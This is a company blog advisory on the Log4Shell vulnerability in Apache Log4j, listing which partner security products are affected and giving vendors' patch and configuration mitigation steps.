Blog

Log4Shell is a 0-day vulnerability with Critical Impact

Last Thursday, a new zero-day vulnerability, called Log4Shell, was detected in Log4j which is a Java logging framework broadly used in enterprise environments to record events and messages generated by software applications. According to security researchers the vulnerability has been under attack for at least more than a week prior to its public disclosure. Update: It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 makes a best-effort attempt to restrict JNDI LDAP lookups to localhost by default. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. How does CVE-2021-44228 work? The flaw concerns a case of remote code execution in Log4j. All that is required of an adversary to leverage the vulnerability is send a specially crafted string containing the malicious code that gets logged by Log4j version 2.0 or higher, effectively enabling the threat actor to load arbitrary code from an attacker-controlled domain on a susceptible server and take over control.

Image

List of affected software

Inter Engineering contacted our software partners to find out if their solutions are in any way affected by the Log4Shell vulnerability. Here is the list. If you have questions or you are unsure whether your version is affected send us a message.

Vendor Product Name Mitigation actions
Clearswift SEG (versions 5.3.0 & 5.4.0)
SXG (versions 5.3.0 & 5.4.0)
SIG (version 5.4.0)
Clearswift released version 5.4.1 that replaces the vulnerable version of Apache Log4j.
Cryoserver Cryoserver Email Archiving Not affected by CVE-2021-44228
F-Secure Policy Manager (all versions)

A deployable fix for this vulnerability was created. Follow the steps below.

  1. Download the patch from the https://download.f-secure.com/corpro/pm/commons-java-log4j-nolookups.jar
  2. Check the SHA256 hash of the file if possible to verify its integrity. It should be 64f7e4e1c6617447a24b0fe44ec7b4776883960cc42cc86be68c613d23ccd5e0
  3. Stop the Policy Manager Server service
  4. Copy the downloaded file to
    • Windows Policy Manager: C:\Program Files (x86)\F-Secure\Management Server 5\lib\
    • Windows Endpoint Proxy: C:\Program Files\F-Secure\ElementsConnector\lib
    • Linux (all products): /opt/f-secure/fspms/lib
  5. Start the Policy Manager Server service

After the service restarts, the patch will automatically take effect.

Note: This patch only applies to version 14 and version 15 of the affected software. It will also apply to version 13, even though this version is out of support.

Policy Manager is not affected by CVE-2021-45046.

Other F-Secure solutions Not affected by CVE-2021-44228 or CVE-2021-45046
HelpSystems GoAnywhere MFT version 5.7.0 or later
GoAnywhere Gateway version 2.7.0 or later
GoAnywhere MFT Agents 1.4.2 or later

GoAnywhere will issue updates to mitigate risks from both vulnerabilities (CVE-2021-44228 and CVE-2021-45046). The updates will be made available through my.goanywhere.com. Until then the administrators can mitigate risks imposed by CVE-2021-44228 with the following actions.

GoAnywhere MFT (all affected versions) & GoAnywhere Gateway (versiions greater than or equal to 2.8.2) GoAnywhere Agents (all affected versions)

Edit <INSTALL_DIR>/config/system.properties and add the following string:

log4j2.formatMsgNoLookups=true

Then restart the GoAnywhere service

GoAnywhere Gateway (versions between 2.7.0 and 2.8.2)

Edit (or create if it does not exist) <INSTALL_DIR>/gagateway.vmoptions and add the following string:

-Dlog4j2.formatMsgNoLookups=true

Edit (or create if it does not exist) <INSTALL_DIR>/bin/gagatewayd.vmoptions and add the following string:

-Dlog4j2.formatMsgNoLookups=true

Restart the gateway application

For more information go to GoAnywhere page for the Log4Shell vulnearbility.

One Identity Safeguard for Privileged Sessions (version 6.x) Disable Safeguard Analytics functionality. This is the only component of Safeguard for Privileged Session that is impacted.
OneSpan Authentication Server (all versions) Virtual Appliance
Authentication Server (all versions)

OneSpan is working on releasing a hotfix. In the meantime we recommend limiting access to product components (e.g., web administration components, APIs) as much as possible.

If the product is accessible publicly, additional actions are required:

  1. Configure Web Application Firewall (WAF), if used, to block attempts to exploit the vulnerability. Customers should contact their WAF vendor to receive WAF rules to block attempts to exploit the Log4j vulnerability.
  2. Mitigate the vulnerability by configuring the Log4j library as follows:
    • Set the system property "log4j2.formatMsgNoLookups" to "true"; or
    • Remove the JndiLookup class from the classpath. In addition Java 8u121 protects against remote code execution by defaulting the following parameters to “false”: com.sun.jndi.rmi.object.trustURLCodebase, com.sun.jndi.cosnaming.object.trustURLCodebase.

These products are not affected by CVE-2021-45046.

Stormshield UTM Appliance (all versions) Not affected by CVE-2021-44228 or CVE-2021-45046
Wallix Access Manager (all versions)

In order to mitigate vulnerability CVE-2021-44228 please contact us to receive the patch files. Then follow the procedure below :

1) Access Manager application installed on Linux

- Transfer the log4j-core-2.8.2.jar file in attachment to the server

- Locate the file log4j-core-2.8.2.jar on the server, by default it is in the Access Manager directory in /opt/wallix/wabam/lib

- Make a backup of the file

cp log4j-core-2.8.2.jar log4j-core-2.8.2.jar.bak

- Replace log4j-core-2.8.2.jar file by the one you retrieved from the KB

cp ./log4j-core-2.8.2.jar log4j-core-2.8.2.jar /opt/wallix/wabam/lib/log4j-core-2.8.2.jar

- Verify the hash of the copied file with the .sha256sum you downloaded before

sha256sum /opt/wallix/wabam/lib/log4j-core-2.8.2.jar
--> d5b5002eeb6471a6026269723821c8a7461c92051a931889d5af53659d6710a1 /opt/wallix/wabam/lib/log4j-core-2.8.2.jar

- Restart Access Manager service

systemctl restart wabam

 

2) Access Manager application installed on Windows

- Transfer the log4j-core-2.8.2.jar file in attachment to the server

- Locate the file log4j-core-2.8.2.jar on the server, by default it is in the Access Manager directory in C:\Program Files\WALLIX\wabam\lib

- Make a backup of the file

- Replace log4j-core-2.8.2.jar file by the one you retrieved from the KB

- From a powershell console, verify the hash of the copied file with the .sha256sum you downloaded before

Get-FileHash 'C:\Program Files\WALLIX\wabam\lib\log4j-core-2.8.2.jar'

- Restart the wabam / WALLIX Access Manager service

 

3) Access Manager as an appliance

- Transfer the log4j-core-2.8.2.jar file in attachment to the server in /home/wabadmin

- Connect to the appliance as wabadmin and go root

super
sudo -i

- Following commands need to be entered as is

- Make a backup of the current file

docker cp access-manager_access_manager_1:/opt/wallix/wabam/lib/log4j-core-2.8.2.jar /home/wabadmin/log4j-core-2.8.2.jar.bak

- Replace the file with the one you retrieved from the KB

docker cp /home/wabadmin/log4j-core-2.8.2.jar access-manager_access_manager_1:/opt/wallix/wabam/lib/log4j-core-2.8.2.jar

- Verify the hash of the copied file with the .sha256sum you downloaded before

docker exec access-manager_access_manager_1 /usr/bin/sha256sum /opt/wallix/wabam/lib/log4j-core-2.8.2.jar
--> d5b5002eeb6471a6026269723821c8a7461c92051a931889d5af53659d6710a1 /opt/wallix/wabam/lib/log4j-core-2.8.2.jar

- Restart Access Manager service

docker restart access-manager_access_manager_1

 

Bastion (all versions) Not affected by CVE-2021-44228 or CVE-2021-45046

 

Public Sources

How attackers are trying to exploit Log4Shell

What you need to know about the Log4J vulnerability rocking the internet

Log4Shell Security Alert: Stormshield’s product response

CVE-2021-44228 Details

CVE-2021-45046 Details

CISA Apache Log4j Vulnerability Guidance